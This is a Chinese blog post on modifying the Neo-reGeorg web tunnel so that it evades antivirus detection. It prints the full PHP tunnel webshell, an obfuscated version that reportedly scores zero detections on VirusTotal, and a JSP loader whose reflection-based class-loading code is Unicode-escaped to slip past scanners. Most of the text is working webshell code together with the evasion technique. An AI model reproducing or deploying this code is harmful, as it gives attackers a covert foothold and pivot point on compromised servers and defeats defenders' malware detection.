免杀Neo-reGeorg隧道工具-0查杀率修改完成

admin 2024年2月22日12:50:15评论20 views字数 22186阅读73分57秒阅读模式
来自

https://github.com/L-codes/Neo-reGeorg

L-codes师傅的原版隧道工具

之后Se7en师傅改写的一个免杀版Neo-reGeorg

只改了aspx的免杀

https://github.com/r00tSe7en/BypassNeo-reGeorg

因此这篇文章,我会继续完善php和jsp的免杀

免杀Neo-reGeorg隧道工具-0查杀率修改完成

Se7en师傅的aspx依旧是0查杀率,还是很猛的

我们回到原版中

通过命令生成

python neoreg.py generate -k Pig

之后将tunnel.php和tunnel.jsp上传VT看看

免杀Neo-reGeorg隧道工具-0查杀率修改完成

php的是8查杀率

<?phpini_set("allow_url_fopen", true);ini_set("allow_url_include", true);ini_set('always_populate_raw_post_data', -1);error_reporting(E_ERROR | E_PARSE);if(version_compare(PHP_VERSION,'5.4.0','>='))@http_response_code(200);function blv_decode($data) {    $data_len = strlen($data);    $info = array();    $i = 0;    while ( $i < $data_len) {        $d = unpack("c1b/N1l", substr($data, $i, 5));        $b = $d['b'];        $l = $d['l'] - 1166039427;        $i += 5;        $v = substr($data, $i, $l);        $i += $l;        $info[$b] = $v;    }    return $info;}function blv_encode($info) {    $data = "";    $info[0] = randstr();    $info[39] = randstr();    foreach($info as $b => $v) {        $l = strlen($v) + 1166039427;        $data .= pack("c1N1", $b, $l);        $data .= $v;    }    return $data;}function randstr() {    $rand = '';    $length = mt_rand(5, 20);    for ($i = 0; $i < $length; $i++) {        $rand .= chr(mt_rand(0, 255));    }    return $rand;}$DATA          = 1;$CMD           = 2;$MARK          = 3;$STATUS        = 4;$ERROR         = 5;$IP            = 6;$PORT          = 7;$REDIRECTURL   = 8;$FORCEREDIRECT = 9;$en = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";$de = "puIAGCBQPyJHVTn4OFziecZ9YD5R8xgfwl3vr+jm7hbKsXoUEtqL/10k2dSN6MWa";$post_data = file_get_contents("php://input");if (0 == 1) {    $post_data = substr($post_data, 0);    $post_data = substr($post_data, 0, -0);}$info = blv_decode(base64_decode(strtr($post_data, $de, $en)));$rinfo = array();$mark = $info[$MARK];$cmd = $info[$CMD];$run = "run".$mark;$writebuf = "writebuf".$mark;$readbuf = "readbuf".$mark;switch($cmd){    case "CONNECT":        {            set_time_limit(0);            $target = $info[$IP];            $port = (int) $info[$PORT];            $res = fsockopen($target, $port, $errno, $errstr, 3);            if ($res === false)            {                $rinfo[$STATUS] = 'FAIL';                $rinfo[$ERROR] = 'Failed connecting to target';                break;            }            stream_set_blocking($res, false);            ignore_user_abort();            @session_start();            $_SESSION[$run] = true;            $_SESSION[$writebuf] = "";            $_SESSION[$readbuf] = "";            session_write_close();            while ($_SESSION[$run])            {                if (empty($_SESSION[$writebuf])) {                    usleep(50000);                }                $readBuff = "";                @session_start();                $writeBuff = $_SESSION[$writebuf];                $_SESSION[$writebuf] = "";                session_write_close();                if ($writeBuff != "")                {                    stream_set_blocking($res, false);                    $i = fwrite($res, $writeBuff);                    if($i === false)                    {                        @session_start();                        $_SESSION[$run] = false;                        session_write_close();                        return;                    }                }                stream_set_blocking($res, false);                while ($o = fgets($res, 513)) {                    if($o === false)                    {                        @session_start();                        $_SESSION[$run] = false;                        session_write_close();                        return;                    }                    $readBuff .= $o;                    if ( strlen($readBuff) > 524288 ) {                        break;                    }                }                if ($readBuff != ""){                    @session_start();                    $_SESSION[$readbuf] .= $readBuff;                    session_write_close();                }            }            fclose($res);        }        @header_remove('set-cookie');        break;    case "DISCONNECT":        {            @session_start();            unset($_SESSION[$run]);            unset($_SESSION[$readbuf]);            unset($_SESSION[$writebuf]);            session_write_close();        }        break;    case "READ":        {            @session_start();            $readBuffer = $_SESSION[$readbuf];            $_SESSION[$readbuf]="";            $running = $_SESSION[$run];            session_write_close();            if ($running) {                $rinfo[$STATUS] = 'OK';                $rinfo[$DATA] = $readBuffer;                header("Connection: Keep-Alive");            } else {                $rinfo[$STATUS] = 'FAIL';                $rinfo[$ERROR] = 'TCP session is closed';            }        }        break;    case "FORWARD": {            @session_start();            $running = $_SESSION[$run];            session_write_close();            if(!$running){                $rinfo[$STATUS] = 'FAIL';                $rinfo[$ERROR] = 'TCP session is closed';                break;            }            $rawPostData = $info[$DATA];            if ($rawPostData) {                @session_start();                $_SESSION[$writebuf] .= $rawPostData;                session_write_close();                $rinfo[$STATUS] = 'OK';                header("Connection: Keep-Alive");            } else {                $rinfo[$STATUS] = 'FAIL';                $rinfo[$ERROR] = 'POST data parse error';            }        }        break;    default: {        $sayhello = true;        @session_start();        session_write_close();    }}if ( $sayhello ) {    echo base64_decode(strtr("4IGXHzuI5AxQZ9xonc+3Vi82FGC2VcxCRAD0RLcQVvTceBDBgmhDFvuccQy4DQh+YiPkRAYtFCcSz3M28mwqTcTuZjOEDZ8wHz/W", $de, $en));} else {    echo strtr(base64_encode(blv_encode($rinfo)), $en, $de);}

这里我采用php混淆达到免杀

免杀Neo-reGeorg隧道工具-0查杀率修改完成

网址为:https://uutool.cn/php/

<?php//Obfuscate by https://uutool.cn/php/ goto DiyoF; qkh1s: $yJiKn = array(); goto c2eVs; V7BSa: qiELO: goto X6ps9; iht0r: NOKcS: goto Dzpx_; fxVqu: if (!(0 == 1)) { goto qsnHO; } goto G7bcV; iyFdO: if ($kgxNf) { goto p348t; } goto j9ldZ; G7bcV: $UDwac = substr($UDwac, 0); goto aJ7VY; anrTn: $pgi43 = "162145141144x62165146" . $le84h; goto WRIfA; X6ps9: LUbTO: goto iyFdO; HjKYv: ini_set("141154x77x61171163x5f160x6fx70x75x6c141x74145x5f162141x77137x70x6f163x74137x64x61164x61", -1); goto ov4mg; mAQvw: $Fdwgu = "160165x49x41x47x43102x51120171112110x56x54x6e64x4f106x7ax69145x63132x3913110465x5270x78x67146167x6c63x7616253x6a15567150142x4bx73130157125105x74161114x2fx31x30x6bx32144x53116x36115x57141"; goto Os3y8; Q9D0I: p348t: goto uoR94; Otptt: function OGR75() { goto MWv6s; uSl_y: $b_8NZ .= chr(mt_rand(0, 255)); goto kbqxM; C1QS1: $L9j4H = mt_rand(5, 20); goto kAlkc; s41b8: pw39c: goto FivlI; FivlI: if (!($eHFvf < $L9j4H)) { goto agdWc; } goto uSl_y; nRKX0: return $b_8NZ; goto FWD42; Blldx: goto pw39c; goto kD8IJ; GksHO: $eHFvf++; goto Blldx; kbqxM: Py1IM: goto GksHO; kAlkc: $eHFvf = 0; goto s41b8; MWv6s: $b_8NZ = ''; goto C1QS1; kD8IJ: agdWc: goto nRKX0; FWD42: } goto MBDTV; LXXRF: $qv16o = 2; goto eEM3n; qw9Qz: $KBl8D = 5; goto E3GYS; DiyoF: ini_set("x61x6cx6c157167x5fx75162x6c137146x6f160x65x6e", true); goto RhTpZ; MBDTV: $kmN5U = 1; goto LXXRF; RhTpZ: ini_set("x61x6c154x6f167137x75162x6c137151x6e143154x75144145", true); goto HjKYv; k2alC: @http_response_code(200); goto iht0r; aJ7VY: $UDwac = substr($UDwac, 0, -0); goto hn1Y1; OE5nK: $bfqIR = 7; goto JNdFi; Dzpx_: function YkFKn($K2yeg) { goto J56qo; b9kH3: goto bdxpT; goto VsuAt; kwzCT: return $vRoxA; goto oo3WG; oBHaV: $eHFvf = 0; goto rvVoQ; VsuAt: vPOFN: goto kwzCT; J56qo: $p4kcO = strlen($K2yeg); goto w1nIi; lppuD: $eHFvf += $GGWi9; goto HtPYQ; XyOCY: $GGWi9 = $zunF2["154"] - 1166039427; goto X9Pjy; rvVoQ: bdxpT: goto FOmCj; FOmCj: if (!($eHFvf < $p4kcO)) { goto vPOFN; } goto Uiled; X9Pjy: $eHFvf += 5; goto Wm_Zg; HtPYQ: $vRoxA[$cFikd] = $xV7UN; goto b9kH3; Wm_Zg: $xV7UN = substr($K2yeg, $eHFvf, $GGWi9); goto lppuD; Uiled: $zunF2 = unpack("x63x31142x2f116x31x6c", substr($K2yeg, $eHFvf, 5)); goto XDVp8; XDVp8: $cFikd = $zunF2["142"]; goto XyOCY; w1nIi: $vRoxA = array(); goto oBHaV; oo3WG: } goto DG_QK; ov4mg: error_reporting(E_ERROR | E_PARSE); goto z3TwM; ar2to: $FDnsT = "x41102103x44105x46107110111112113114115116117x50x51x52x53x54125126x57130x59132x61x62143144145x66x67150151152153x6c155156157x70161x72x73164x75166167170x79x7ax30x3162x33x34x3566x37x38x3953x2f"; goto mAQvw; eL4Vs: goto O1FHC; goto Q9D0I; eEM3n: $wG38l = 3; goto ystKv; DG_QK: function nHcmy($vRoxA) { goto siiD9; wlfOi: $vRoxA[39] = oGR75(); goto KAekY; RZXtK: return $K2yeg; goto L7DLT; N3ATX: $vRoxA[0] = OgR75(); goto wlfOi; vpz3E: BzP21: goto RZXtK; KAekY: foreach ($vRoxA as $cFikd => $xV7UN) { goto jzIeX; BXXkg: $K2yeg .= pack("14361x4e61", $cFikd, $GGWi9); goto ldnbr; kgAur: KKAEH: goto StzWf; ldnbr: $K2yeg .= $xV7UN; goto kgAur; jzIeX: $GGWi9 = strlen($xV7UN) + 1166039427; goto BXXkg; StzWf: } goto vpz3E; siiD9: $K2yeg = ''; goto N3ATX; L7DLT: } goto Otptt; JNdFi: $LWf6B = 8; goto z9mSH; y5Mgt: $uIwpy = "167162x69164x65x62x75x66" . $le84h; goto anrTn; LKfMs: $UGmnG = "x72165156" . $le84h; goto y5Mgt; uoR94: echo base64_decode(strtr("x34x49x47130110x7a165x49x35101x78121x5a71170157156x63x2bx33126151x38x32106x47x4362126x63170103x52101x4460122114143x51x56x76124x63145x42x44102147155x68104106x76x75x63143121x7964104121x68x2bx59x69x50x6b122101131164x46x43x63x53172x33x4dx32x38x6dx77161124143x54165132x6a117105104132x38167110x7a57x57", $Fdwgu, $FDnsT)); goto ynfgy; c2eVs: $le84h = $vRoxA[$wG38l]; goto f9zL9; UkJrZ: $vRoxA = Ykfkn(base64_decode(strtr($UDwac, $Fdwgu, $FDnsT))); goto qkh1s; WRIfA: switch ($nmTgZ) { case "x43117x4ex4ex45x43x54": goto wDJIo; pHFVG: cK0X4: goto F0l9p; Y5yDt: @session_start(); goto UdQCO; Axxtp: $_SESSION[$uIwpy] = ''; goto eb49j; eb49j: $_SESSION[$pgi43] = ''; goto ESlro; BW16x: stream_set_blocking($B8OFT, false); goto uBpnK; bBh1T: $_SESSION[$uIwpy] = ''; goto y27SM; RXKxW: session_write_close(); goto oxklA; dIvVN: return; goto MLNR8; WsezN: if (!(strlen($MVF3v) > 524288)) { goto lZU0u; } goto FeuSH; asVZg: if (!$_SESSION[$UGmnG]) { goto HzoMW; } goto tY8R4; Y9VQG: lZU0u: goto mblUv; HEGaw: HA7EC: goto miGP9; uWv8z: @session_start(); goto wk0g7; mblUv: goto VRhv7; goto GV_MR; hTlRx: @session_start(); goto PGHJj; vYfUE: if (!($MVF3v != '')) { goto HA7EC; } goto Y5yDt; Ajj6v: if (!($Fc2s7 === false)) { goto htBK1; } goto hTlRx; miGP9: goto OkL9w; goto wfPvC; R_LSl: $_SESSION[$UGmnG] = false; goto RXKxW; uBpnK: ignore_user_abort(); goto XA31G; L5IQM: VRhv7: goto NTRyY; y27SM: session_write_close(); goto u_Dxt; VVV5d: usleep(50000); goto HirsH; wDJIo: set_time_limit(0); goto Nd2F_; oxklA: return; goto pHFVG; ESlro: session_write_close(); goto WIy9g; nN4Yj: $_SESSION[$UGmnG] = true; goto Axxtp; BwPRn: $eHFvf = fwrite($B8OFT, $YM3Op); goto OEAmb; tyTFK: $yJiKn[$uUATI] = "x46101x49x4c"; goto KIF3r; u_Dxt: if (!($YM3Op != '')) { goto Drp44; } goto mwD54; HirsH: Uxw2C: goto dhegN; nzgsI: session_write_close(); goto dIvVN; XA31G: @session_start(); goto nN4Yj; F0l9p: Drp44: goto P0J64; PGHJj: $_SESSION[$UGmnG] = false; goto nzgsI; KIF3r: $yJiKn[$KBl8D] = "106141151x6cx65x6440143x6f156156145143x74151156x67x20x74157x20164141x72147x65164"; goto v6su1; P0J64: stream_set_blocking($B8OFT, false); goto L5IQM; tl_Yc: fclose($B8OFT); goto lNdbp; dhegN: $MVF3v = ''; goto uWv8z; FeuSH: goto D_0pc; goto Y9VQG; GV_MR: D_0pc: goto vYfUE; Zlv9z: goto LUbTO; goto WDfVs; eTyPT: @session_start(); goto R_LSl; tNulH: gBeXB: goto BW16x; NTRyY: if (!($Fc2s7 = fgets($B8OFT, 513))) { goto D_0pc; } goto Ajj6v; MLNR8: htBK1: goto yNMbd; xoeLD: $T3Ttz = (int) $vRoxA[$bfqIR]; goto sciZo; v6su1: goto LUbTO; goto tNulH; UdQCO: $_SESSION[$pgi43] .= $MVF3v; goto uIHgZ; sciZo: $B8OFT = fsockopen($IZI9I, $T3Ttz, $hywsM, $REcOR, 3); goto NlUoE; wfPvC: HzoMW: goto tl_Yc; tY8R4: if (!empty($_SESSION[$uIwpy])) { goto Uxw2C; } goto VVV5d; Nd2F_: $IZI9I = $vRoxA[$ZYIdm]; goto xoeLD; lNdbp: @header_remove("x73x65x7455x63157x6f153x69x65"); goto Zlv9z; mwD54: stream_set_blocking($B8OFT, false); goto BwPRn; NlUoE: if (!($B8OFT === false)) { goto gBeXB; } goto tyTFK; WIy9g: OkL9w: goto asVZg; uIHgZ: session_write_close(); goto HEGaw; yNMbd: $MVF3v .= $Fc2s7; goto WsezN; OEAmb: if (!($eHFvf === false)) { goto cK0X4; } goto eTyPT; wk0g7: $YM3Op = $_SESSION[$uIwpy]; goto bBh1T; WDfVs: case "x44111123103x4f116116x45103x54": goto fxIBW; kaJhO: unset($_SESSION[$uIwpy]); goto OcrQR; uPp6U: goto LUbTO; goto jqdkX; OcrQR: session_write_close(); goto uPp6U; gGij3: unset($_SESSION[$UGmnG]); goto mPPq3; mPPq3: unset($_SESSION[$pgi43]); goto kaJhO; fxIBW: @session_start(); goto gGij3; jqdkX: case "122x45101104": goto VCR_2; yhm95: xdxv2: goto ldlX7; CFAc3: if ($e28fe) { goto gsqey; } goto UhMGi; SrpIM: $yJiKn[$KBl8D] = "12410312040x73145x73x73151157x6e4015116340143x6cx6fx73145x64"; goto LR3ia; DGo6y: gsqey: goto Qcauz; Qcauz: $yJiKn[$uUATI] = "117x4b"; goto fVwtM; UhMGi: $yJiKn[$uUATI] = "x46x41111x4c"; goto SrpIM; iu1jN: $_SESSION[$pgi43] = ''; goto vUqS3; VCR_2: @session_start(); goto h0tNG; nqHeE: session_write_close(); goto CFAc3; GCQWB: header("x43157156x6e145143164151x6fx6e72x20x4b145x65160x2dx41x6c151x76145"); goto yhm95; LR3ia: goto xdxv2; goto DGo6y; fVwtM: $yJiKn[$kmN5U] = $pb70k; goto GCQWB; h0tNG: $pb70k = $_SESSION[$pgi43]; goto iu1jN; vUqS3: $e28fe = $_SESSION[$UGmnG]; goto nqHeE; ldlX7: goto LUbTO; goto sIXPy; sIXPy: case "106117x52127x41x52104": goto qMaUE; wN33E: goto ZTF42; goto dOIFX; yF59G: @session_start(); goto M3VEA; BA8GR: $yJiKn[$uUATI] = "106x41111114"; goto CcVtt; xb8TN: header("103157156156145143164151x6fx6ex3ax20113145x65160x2dx41154151166145"); goto EKtxG; g00Tk: $azrOI = $vRoxA[$kmN5U]; goto YiNK_; M3VEA: $_SESSION[$uIwpy] .= $azrOI; goto K0X1m; CcVtt: $yJiKn[$KBl8D] = "120117x53x5440144x61x7414140x70141162163x6540145x72x72157162"; goto wN33E; dOIFX: D_vyP: goto yF59G; aKG_q: KyAsp: goto g00Tk; EKtxG: ZTF42: goto VKg0l; EoWDz: $e28fe = $_SESSION[$UGmnG]; goto YABUJ; YiNK_: if ($azrOI) { goto D_vyP; } goto BA8GR; VKg0l: goto LUbTO; goto A0wmJ; eQsdn: if ($e28fe) { goto KyAsp; } goto cdEAy; esiw4: $yJiKn[$KBl8D] = "x54103x5040163145163x73151x6f1564015116340x63154x6fx73145144"; goto si62p; cdEAy: $yJiKn[$uUATI] = "x46x41111114"; goto esiw4; K0X1m: session_write_close(); goto X1sIQ; qMaUE: @session_start(); goto EoWDz; YABUJ: session_write_close(); goto eQsdn; X1sIQ: $yJiKn[$uUATI] = "x4fx4b"; goto xb8TN; si62p: goto LUbTO; goto aKG_q; A0wmJ: default: goto yCKjb; yCKjb: $kgxNf = true; goto tADqD; O4nld: session_write_close(); goto Hta0P; tADqD: @session_start(); goto O4nld; Hta0P: } goto V7BSa; z3TwM: if (!version_compare(PHP_VERSION, "x35x2ex34x2ex30", "76x3d")) { goto NOKcS; } goto k2alC; Os3y8: $UDwac = file_get_contents("x70150x707257x2f151156x70x75x74"); goto fxVqu; hn1Y1: qsnHO: goto UkJrZ; f9zL9: $nmTgZ = $vRoxA[$qv16o]; goto LKfMs; E3GYS: $ZYIdm = 6; goto OE5nK; ystKv: $uUATI = 4; goto qw9Qz; z9mSH: $VUADc = 9; goto ar2to; j9ldZ: echo strtr(base64_encode(nhcmy($yJiKn)), $FDnsT, $Fdwgu); goto eL4Vs; ynfgy: O1FHC:

将混淆好的代码重新上传VT

免杀Neo-reGeorg隧道工具-0查杀率修改完成

成功0查杀率

再到jsp

免杀Neo-reGeorg隧道工具-0查杀率修改完成

VT为17的查杀率

通过分析该jsp

<%@page pageEncoding="UTF-8"%><%!    public static java.util.Map<String,Object> namespace = new java.util.HashMap<String,Object>();    public static byte[] unGzip(byte[] bytes) throws Exception{        java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();        java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes);        java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in);        byte[] buffer = new byte[256];        int n;        while ((n = ungzip.read(buffer)) >= 0)            out.write(buffer, 0, n);        return out.toByteArray();    }    public static Class loader(byte[] bytes) throws Exception {        java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());        java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100,101,102,105,110,101,67,108,97,115,115}), new Class[]{byte[].class, int.class, int.class});    method.setAccessible(true);    Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)});     return clazz;    }%><%    String charslist = "puIAGCBQPyJHVTn4OFziecZ9YD5R8xgfwl3vr+jm7hbKsXoUEtqL/10k2dSN6MWa";    Object[] args = new Object[]{        request, //0        response, //1        charslist.toCharArray(), //2        new byte[]{-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,37,-1,-1,-1,52,54,53,56,34,15,26,60,40,28,23,-1,-1,-1,-1,-1,-1,-1,3,6,5,25,48,17,4,11,2,10,43,51,61,59,16,8,7,27,58,13,47,12,62,45,24,22,-1,-1,-1,-1,-1,-1,63,42,21,57,20,31,30,41,19,38,55,33,39,14,46,0,50,36,44,49,1,35,32,29,9,18,-1,-1,-1,-1,-1},//3        new Integer(200),//4        new Integer(513),//5        new Integer(524288),//6        "4IGXHzuI5AxQZ9xonc+3Vi82FGC2VcxCRAD0RLcQVvTceBDBgmhDFvuccQy4DQh+YiPkRAYtFCcSz3M28mwqTcTuZjOEDZ8wHz/W",//7        new Integer(1166039427),//8        new Integer(0),//9        new Integer(0),//10        new Integer(0),//11    };    if(namespace.get(charslist) == null){        byte[] clazzBytes = unGzip(new byte[]{字节码部分});        Class clazz = loader(clazzBytes);        namespace.put(charslist, clazz.newInstance());    }    namespace.get(charslist).equals(args);%>

因此,VT的主要查杀位置是在加载器的部分

unGzip方法用于解压缩字节数组。它使用GZIPInputStream类来读取被压缩的数据,并将解压后的数据写入ByteArrayOutputStream中,最终返回解压后的字节数组。
loader方法通过自定义的类加载器(URLClassLoader)加载一个字节数组表示的类。它使用反射调用ClassLoader类中的私有方法,将字节数组转换为Class对象并返回

免杀Neo-reGeorg隧道工具-0查杀率修改完成

ClassLoader加载器处的查杀位置

我们可以对这部分进行

unicode编码,也可以使用编码网址:

https://3gmfw.cn/tools/unicodebianmazhuanhuanqi/

 public static java.util.Map<String,Object> namespace = new java.util.HashMap<String,Object>();    public static byte[] unGzip(byte[] bytes) throws Exception{        java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();        java.io.ByteArrayInputStream in = new java.io.ByteArrayInputStream(bytes);        java.util.zip.GZIPInputStream ungzip = new java.util.zip.GZIPInputStream(in);        byte[] buffer = new byte[256];        int n;        while ((n = ungzip.read(buffer)) >= 0)            out.write(buffer, 0, n);        return out.toByteArray();    }    public static Class loader(byte[] bytes) throws Exception {        java.net.URLClassLoader classLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());        java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(new String(new byte[]{100,101,102,105,110,101,67,108,97,115,115}), new Class[]{byte[].class, int.class, int.class});    method.setAccessible(true);    Class clazz = (Class) method.invoke(classLoader, new Object[]{bytes, new Integer(0), new Integer(bytes.length)});     return clazz;    }

免杀Neo-reGeorg隧道工具-0查杀率修改完成

最终变为:

<%@page pageEncoding="UTF-8"%><%u0020u0020u0020u0020u0070u0075u0062u006cu0069u0063u0020u0073u0074u0061u0074u0069u0063u0020u006au0061u0076u0061u002eu0075u0074u0069u006cu002eu004du0061u0070u003cu0053u0074u0072u0069u006eu0067u002cu004fu0062u006au0065u0063u0074u003eu0020u006eu0061u006du0065u0073u0070u0061u0063u0065u0020u003du0020u006eu0065u0077u0020u006au0061u0076u0061u002eu0075u0074u0069u006cu002eu0048u0061u0073u0068u004du0061u0070u003cu0053u0074u0072u0069u006eu0067u002cu004fu0062u006au0065u0063u0074u003eu0028u0029u003bu000du000au000du000au0020u0020u0020u0020u0070u0075u0062u006cu0069u0063u0020u0073u0074u0061u0074u0069u0063u0020u0062u0079u0074u0065u005bu005du0020u0075u006eu0047u007au0069u0070u0028u0062u0079u0074u0065u005bu005du0020u0062u0079u0074u0065u0073u0029u0020u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu007bu000du000au0020u0020u0020u0020u0020u0020u0020u0020u006au0061u0076u0061u002eu0069u006fu002eu0042u0079u0074u0065u0041u0072u0072u0061u0079u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0020u006fu0075u0074u0020u003du0020u006eu0065u0077u0020u006au0061u0076u0061u002eu0069u006fu002eu0042u0079u0074u0065u0041u0072u0072u0061u0079u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u003bu000du000au0020u0020u0020u0020u0020u0020u0020u0020u006au0061u0076u0061u002eu0069u006fu002eu0042u0079u0074u0065u0041u0072u0072u0061u0079u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0020u0069u006eu0020u003du0020u006eu0065u0077u0020u006au0061u0076u0061u002eu0069u006fu002eu0042u0079u0074u0065u0041u0072u0072u0061u0079u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0062u0079u0074u0065u0073u0029u003bu000du000au0020u0020u0020u0020u0020u0020u0020u0020u006au0061u0076u0061u002eu0075u0074u0069u006cu002eu007au0069u0070u002eu0047u005au0049u0050u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0020u0075u006eu0067u007au0069u0070u0020u003du0020u006eu0065u0077u0020u006au0061u0076u0061u002eu0075u0074u0069u006cu002eu007au0069u0070u002eu0047u005au0049u0050u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0069u006eu0029u003bu000du000au0020u0020u0020u0020u0020u0020u0020u0020u0062u0079u0074u0065u005bu005du0020u0062u0075u0066u0066u0065u0072u0020u003du0020u006eu0065u0077u0020u0062u0079u0074u0065u005bu0032u0035u0036u005du003bu000du000au0020u0020u0020u0020u0020u0020u0020u0020u0069u006eu0074u0020u006eu003bu000du000au0020u0020u0020u0020u0020u0020u0020u0020u0077u0068u0069u006cu0065u0020u0028u0028u006eu0020u003du0020u0075u006eu0067u007au0069u0070u002eu0072u0065u0061u0064u0028u0062u0075u0066u0066u0065u0072u0029u0029u0020u003eu003du0020u0030u0029u000du000au0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u006fu0075u0074u002eu0077u0072u0069u0074u0065u0028u0062u0075u0066u0066u0065u0072u002cu0020u0030u002cu0020u006eu0029u003bu000du000au0020u0020u0020u0020u0020u0020u0020u0020u0072u0065u0074u0075u0072u006eu0020u006fu0075u0074u002eu0074u006fu0042u0079u0074u0065u0041u0072u0072u0061u0079u0028u0029u003bu000du000au0020u0020u0020u0020u007du000du000au000du000au0020u0020u0020u0020u0070u0075u0062u006cu0069u0063u0020u0073u0074u0061u0074u0069u0063u0020u0043u006cu0061u0073u0073u0020u006cu006fu0061u0064u0065u0072u0028u0062u0079u0074u0065u005bu005du0020u0062u0079u0074u0065u0073u0029u0020u0074u0068u0072u006fu0077u0073u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0020u007bu000du000au0020u0020u0020u0020u0020u0020u0020u0020u006au0061u0076u0061u002eu006eu0065u0074u002eu0055u0052u004cu0043u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u0020u0063u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u0020u003du0020u006eu0065u0077u0020u006au0061u0076u0061u002eu006eu0065u0074u002eu0055u0052u004cu0043u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u0028u006eu0065u0077u0020u006au0061u0076u0061u002eu006eu0065u0074u002eu0055u0052u004cu005bu0030u005du002cu0020u0054u0068u0072u0065u0061u0064u002eu0063u0075u0072u0072u0065u006eu0074u0054u0068u0072u0065u0061u0064u0028u0029u002eu0067u0065u0074u0043u006fu006eu0074u0065u0078u0074u0043u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u0028u0029u0029u003bu000du000au0020u0020u0020u0020u0020u0020u0020u0020u006au0061u0076u0061u002eu006cu0061u006eu0067u002eu0072u0065u0066u006cu0065u0063u0074u002eu004du0065u0074u0068u006fu0064u0020u006du0065u0074u0068u006fu0064u0020u003du0020u0043u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u002eu0063u006cu0061u0073u0073u002eu0067u0065u0074u0044u0065u0063u006cu0061u0072u0065u0064u004du0065u0074u0068u006fu0064u0028u006eu0065u0077u0020u0053u0074u0072u0069u006eu0067u0028u006eu0065u0077u0020u0062u0079u0074u0065u005bu005du007bu0031u0030u0030u002cu0031u0030u0031u002cu0031u0030u0032u002cu0031u0030u0035u002cu0031u0031u0030u002cu0031u0030u0031u002cu0036u0037u002cu0031u0030u0038u002cu0039u0037u002cu0031u0031u0035u002cu0031u0031u0035u007du0029u002cu0020u006eu0065u0077u0020u0043u006cu0061u0073u0073u005bu005du007bu0062u0079u0074u0065u005bu005du002eu0063u006cu0061u0073u0073u002cu0020u0069u006eu0074u002eu0063u006cu0061u0073u0073u002cu0020u0069u006eu0074u002eu0063u006cu0061u0073u0073u007du0029u003bu000du000au0009u0009u006du0065u0074u0068u006fu0064u002eu0073u0065u0074u0041u0063u0063u0065u0073u0073u0069u0062u006cu0065u0028u0074u0072u0075u0065u0029u003bu000du000au0009u0009u0043u006cu0061u0073u0073u0020u0063u006cu0061u007au007au0020u003du0020u0028u0043u006cu0061u0073u0073u0029u0020u006du0065u0074u0068u006fu0064u002eu0069u006eu0076u006fu006bu0065u0028u0063u006cu0061u0073u0073u004cu006fu0061u0064u0065u0072u002cu0020u006eu0065u0077u0020u004fu0062u006au0065u0063u0074u005bu005du007bu0062u0079u0074u0065u0073u002cu0020u006eu0065u0077u0020u0049u006eu0074u0065u0067u0065u0072u0028u0030u0029u002cu0020u006eu0065u0077u0020u0049u006eu0074u0065u0067u0065u0072u0028u0062u0079u0074u0065u0073u002eu006cu0065u006eu0067u0074u0068u0029u007du0029u003bu0020u000du000au0009u0009u0072u0065u0074u0075u0072u006eu0020u0063u006cu0061u007au007au003bu000du000au0020u0020u0020u0020u007d%><%    String charslist = "puIAGCBQPyJHVTn4OFziecZ9YD5R8xgfwl3vr+jm7hbKsXoUEtqL/10k2dSN6MWa";    Object[] args = new Object[]{        request, //0        response, //1        charslist.toCharArray(), //2        new byte[]{-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,37,-1,-1,-1,52,54,53,56,34,15,26,60,40,28,23,-1,-1,-1,-1,-1,-1,-1,3,6,5,25,48,17,4,11,2,10,43,51,61,59,16,8,7,27,58,13,47,12,62,45,24,22,-1,-1,-1,-1,-1,-1,63,42,21,57,20,31,30,41,19,38,55,33,39,14,46,0,50,36,44,49,1,35,32,29,9,18,-1,-1,-1,-1,-1},//3        new Integer(200),//4        new Integer(513),//5        new Integer(524288),//6        "4IGXHzuI5AxQZ9xonc+3Vi82FGC2VcxCRAD0RLcQVvTceBDBgmhDFvuccQy4DQh+YiPkRAYtFCcSz3M28mwqTcTuZjOEDZ8wHz/W",//7        new Integer(1166039427),//8        new Integer(0),//9        new Integer(0),//10        new Integer(0),//11    };    if(namespace.get(charslist) == null){        byte[] clazzBytes = unGzip(new byte[]{字节码部分});        Class clazz = loader(clazzBytes);        namespace.put(charslist, clazz.newInstance());    }    namespace.get(charslist).equals(args);%>

上传VT看看

免杀Neo-reGeorg隧道工具-0查杀率修改完成

0查杀率完成

ashx和jspx基本都是一致的代码内容,所以不再重复改了

